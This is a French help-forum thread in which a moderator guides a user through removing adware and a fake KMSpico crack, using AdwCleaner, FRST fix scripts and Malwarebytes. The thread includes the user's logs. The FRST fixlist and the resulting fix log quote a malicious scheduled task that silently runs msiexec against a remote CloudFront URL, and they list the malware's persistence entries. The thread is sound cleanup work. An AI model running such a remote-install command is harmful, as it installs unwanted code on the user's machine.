Signaler

Mon navigateur s'ouvre tout seul et ouvre un nouvel onglet chaque 2 a 3 min en c [Résolu]

Posez votre question legenie1 11Messages postés samedi 25 octobre 2014Date d'inscription 14 juin 2017 Dernière intervention - Dernière réponse le 14 juin 2017 à 18:08 par Malekal_morte-
Bonjour,
je reviens sur ce sujet car j'ai le même problème.
mon navigateur se lance tout seul et ouvre après environ 2 a 3 min un nouvel vers le sitebesroffertfortoday.com/redirect/57a764d042bf8

j'ai lu plusieurs sujets similaires et après un scan avec OTL.exe
voici le fichier log du scan..
si quelqu'un peut m'aider

(fichier du scan): hxxps://www.mediafire.com/download/riz30dbfbx3ab25

Utile
+0
plus moins
Salut,

Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Voici les étapes de la procédure à suivre :

1°)
Suis le tutoriel AdwCleaner d'Xplode
  • Télécharge le sur ton Bureau ou dans ton dossier des téléchargements,
  • Lance "AdwCleaner" puis clique sur [Scanner],
  • L'analyse va durer plusieurs minutes, patiente,
  • Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer],
  • Une fois le nettoyage terminé, un rapport va s'ouvrir,
  • Copie/colle le contenu du rapport dans tca prochaine réponse.


Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
(ne pas utiliser zoek et faire une réinitialisation manuelle)

3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


Donnez votre avis
Utile
+0
plus moins
# AdwCleaner v6.047 - Logfile created 13/06/2017 at 12:31:45
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-05-19.1 [Local]
# Operating System : Windows 8.1 (X64)
# Username : FRED - FS
# Running from : C:\Users\FRED\Desktop\adwcleaner_6.047.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support
          • [ Services ] *****


[-] Service deleted: swdumon
          • [ Folders ] *****
          • [ Files ] *****


[-] File deleted: C:\Windows\SysNative\drivers\swdumon.sys
          • [ DLL ] *****
          • [ WMI ] *****
          • [ Shortcuts ] *****
          • [ Scheduled Tasks ] *****
          • [ Registry ] *****


[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
          • [ Web browsers ] *****


:: "Tracing" keys deleted
:: Winsock settings cleared


C:\AdwCleaner\AdwCleaner[C0].txt - [6187 Bytes] - [13/06/2017 07:14:34]
C:\AdwCleaner\AdwCleaner[C2].txt - [1263 Bytes] - [13/06/2017 07:31:30]
C:\AdwCleaner\AdwCleaner[C3].txt - [1410 Bytes] - [13/06/2017 08:13:01]
C:\AdwCleaner\AdwCleaner[C4].txt - [1101 Bytes] - [13/06/2017 12:31:45]
C:\AdwCleaner\AdwCleaner[S0].txt - [5694 Bytes] - [13/06/2017 07:11:05]
C:\AdwCleaner\AdwCleaner[S1].txt - [1321 Bytes] - [13/06/2017 07:28:13]
C:\AdwCleaner\AdwCleaner[S2].txt - [1467 Bytes] - [13/06/2017 08:10:44]
C:\AdwCleaner\AdwCleaner[S3].txt - [1602 Bytes] - [13/06/2017 08:26:16]
C:\AdwCleaner\AdwCleaner[S4].txt - [1675 Bytes] - [13/06/2017 12:29:25]

########## EOF - C:\AdwCleaner\AdwCleaner[C4].txt - [1539 Bytes] ##########
Donnez votre avis
Utile
+0
plus moins
Donnez votre avis
Utile
+0
plus moins
Peut-être désinstaller tous ces programmes, non essentiel :
AVG Driver Updater (totalement inutile)
CyberLink
Intel Security True Key (totalement inutile)
Java
MEGAsync
WildTangent Games


Tu t'es fait avoir un par un faux crack KSMPico.
Mais Windows était déjà infecté d'un autre crack bidon.

A lire :
https://www.malekal.com/kmspico-trojan/
https://forum.malekal.com/danger-des-cracks-t893.html


~~

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {96D074F9-BF90-477F-B80F-D4B0336D3BD9} - System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_X4ORCI2ATXXX4ORCI2AT&d=20170520 /q <==== ATTENTION
HKLM-x32\...\Run: [Further Market Inc.] => C:\Program Files (x86)\FurtherMarket\FutherMarket.exe [2148352 2015-01-27] ()
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [RK8V7OYPBGTLAF2] => C:\Program Files\G0W3PP3BGI\G0W3PP3BG.exe [1039872 2017-06-10] (AQ70NCA)
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [WJ2VHRKL0YSU72H] => C:\Program Files (x86)\ov2qg33lsiv\66VXP.exe [1039872 2017-06-10] (AQ70NCA)
ShellExecuteHooks: No Name - {09D8E2B0-392B-11E7-BEAF-64006A5CFC23} - C:\Users\FRED\AppData\Roaming\Morulekazer\Datele.dll [144384 2017-05-20] ()
R2 UnsignedThemes; C:\Windows\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [File not signed]
2017-06-10 13:29 - 2017-06-10 13:29 - 00001164 _____ C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk
2017-06-10 13:23 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\yxouyq2dxv3
2017-06-10 13:22 - 2017-06-10 20:01 - 00000000 ____D C:\Program Files (x86)\NoterSave
2017-06-10 13:22 - 2017-06-10 16:15 - 00000000 ____D C:\Program Files (x86)\ov2qg33lsiv
2017-06-10 13:22 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\u5uojlu0ped
2017-06-10 13:22 - 2017-06-10 13:23 - 00000000 ____D C:\Program Files\G0W3PP3BGI
2017-06-04 23:42 - 2017-06-04 23:42 - 00001074 _____ C:\Users\Public\Desktop\FurtherMarket.lnk
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Users\FRED\AppData\Local\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Program Files (x86)\FurtherMarket
2017-06-01 10:11 - 2017-06-05 05:29 - 00000000 ____D C:\Users\FRED\AppData\Local\glory
2017-06-01 10:11 - 2017-06-01 22:16 - 00000000 ____D C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B}
2017-06-01 10:11 - 2017-06-01 10:11 - 00000000 ____D C:\Stuvatybugtain
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Users\FRED\AppData\Local\terana
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA}
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Pipisy
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files\MK
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7}
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Cosusp
2017-05-20 09:11 - 2017-05-24 16:47 - 00000000 ____D C:\Program Files (x86)\Biwerghtplawock
2017-05-20 09:11 - 2017-05-20 09:11 - 00006074 _____ C:\Windows\System32\Tasks\Pracly Debuger
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Roaming\Morulekazer
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Local\Kerlersh
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Program Files (x86)\Pracly Debuger
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.

Donnez votre avis
Utile
+0
plus moins
ok je me lance
Donnez votre avis
Utile
+0
plus moins
frst/fix
fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 12-06-2017
Ran by FRED (13-06-2017 17:04:27) Run:1
Running from C:\Users\FRED\Desktop
Loaded Profiles: FRED (Available Profiles: FRED)
Boot Mode: Normal
==============================================

fixlist content:

reateRestorePoint:
CloseProcesses:
Task: {96D074F9-BF90-477F-B80F-D4B0336D3BD9} - System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_X4ORCI2ATXXX4ORCI2AT&d=20170520 /q <==== ATTENTION
HKLM-x32\...\Run: [Further Market Inc.] => C:\Program Files (x86)\FurtherMarket\FutherMarket.exe [2148352 2015-01-27] ()
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [RK8V7OYPBGTLAF2] => C:\Program Files\G0W3PP3BGI\G0W3PP3BG.exe [1039872 2017-06-10] (AQ70NCA)
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [WJ2VHRKL0YSU72H] => C:\Program Files (x86)\ov2qg33lsiv\66VXP.exe [1039872 2017-06-10] (AQ70NCA)
ShellExecuteHooks: No Name - {09D8E2B0-392B-11E7-BEAF-64006A5CFC23} - C:\Users\FRED\AppData\Roaming\Morulekazer\Datele.dll [144384 2017-05-20] ()
R2 UnsignedThemes; C:\Windows\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [File not signed]
2017-06-10 13:29 - 2017-06-10 13:29 - 00001164 _____ C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk
2017-06-10 13:23 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\yxouyq2dxv3
2017-06-10 13:22 - 2017-06-10 20:01 - 00000000 ____D C:\Program Files (x86)\NoterSave
2017-06-10 13:22 - 2017-06-10 16:15 - 00000000 ____D C:\Program Files (x86)\ov2qg33lsiv
2017-06-10 13:22 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\u5uojlu0ped
2017-06-10 13:22 - 2017-06-10 13:23 - 00000000 ____D C:\Program Files\G0W3PP3BGI
2017-06-04 23:42 - 2017-06-04 23:42 - 00001074 _____ C:\Users\Public\Desktop\FurtherMarket.lnk
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Users\FRED\AppData\Local\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Program Files (x86)\FurtherMarket
2017-06-01 10:11 - 2017-06-05 05:29 - 00000000 ____D C:\Users\FRED\AppData\Local\glory
2017-06-01 10:11 - 2017-06-01 22:16 - 00000000 ____D C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B}
2017-06-01 10:11 - 2017-06-01 10:11 - 00000000 ____D C:\Stuvatybugtain
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Users\FRED\AppData\Local\terana
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA}
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Pipisy
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files\MK
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7}
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Cosusp
2017-05-20 09:11 - 2017-05-24 16:47 - 00000000 ____D C:\Program Files (x86)\Biwerghtplawock
2017-05-20 09:11 - 2017-05-20 09:11 - 00006074 _____ C:\Windows\System32\Tasks\Pracly Debuger
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Roaming\Morulekazer
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Local\Kerlersh
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Program Files (x86)\Pracly Debuger
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


reateRestorePoint: => Error: No automatic fix found for this entry.
Processes closed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Hogock => key removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Further Market Inc. => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\RK8V7OYPBGTLAF2 => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WJ2VHRKL0YSU72H => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => value removed successfully
HKLM\Software\Classes\CLSID\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => key removed successfully
HKLM\System\CurrentControlSet\Services\UnsignedThemes => key removed successfully
UnsignedThemes => service removed successfully
C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk => moved successfully
C:\Users\FRED\AppData\Roaming\yxouyq2dxv3 => moved successfully
C:\Program Files (x86)\NoterSave => moved successfully
C:\Program Files (x86)\ov2qg33lsiv => moved successfully
C:\Users\FRED\AppData\Roaming\u5uojlu0ped => moved successfully
C:\Program Files\G0W3PP3BGI => moved successfully
C:\Users\Public\Desktop\FurtherMarket.lnk => moved successfully
C:\Users\FRED\AppData\Local\FurtherMarket => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket => moved successfully
C:\Program Files (x86)\FurtherMarket => moved successfully
C:\Users\FRED\AppData\Local\glory => moved successfully
C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B} => moved successfully
C:\Stuvatybugtain => moved successfully
C:\Users\FRED\AppData\Local\terana => moved successfully
C:\Program Files (x86)\MIO => moved successfully
C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA} => moved successfully
C:\Pipisy => moved successfully
C:\Program Files\MK => moved successfully
C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7} => moved successfully
C:\Cosusp => moved successfully
C:\Program Files (x86)\Biwerghtplawock => moved successfully
C:\Windows\System32\Tasks\Pracly Debuger => moved successfully
C:\Users\FRED\AppData\Roaming\Morulekazer => moved successfully
C:\Users\FRED\AppData\Local\Kerlersh => moved successfully
C:\Program Files (x86)\Pracly Debuger => moved successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8595825 B
Java, Flash, Steam htmlcache => 708 B
Windows/system/drivers => 121910297 B
Edge => 0 B
Chrome => 147456 B
Firefox => 2113062 B
Opera => 214016 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile32 => 0 B
LocalService => 26336 B
NetworkService => 0 B
FRED => 17648222 B

RecycleBin => 0 B
EmptyTemp: => 151.7 MB temporary data Removed.

================================


The system needed a reboot.

End of Fixlog 17:04:35

Donnez votre avis
Utile
+0
plus moins
compte rendu malwarebyte

https://pjjoint.malekal.com/files.php?id=20170614_k13r13u14k9l9
Donnez votre avis
Utile
+0
plus moins
Merci jusqu'ici tout vas bien je suis en observation jusqu'à ce soir... je vérifie que tout vas bien...
grand merci après je passerai le sujet a résolu
Malekal_morte- 139563Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 20 octobre 2017 Dernière intervention - 14 juin 2017 à 18:08
ça roule :)
Répondre
Donnez votre avis

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !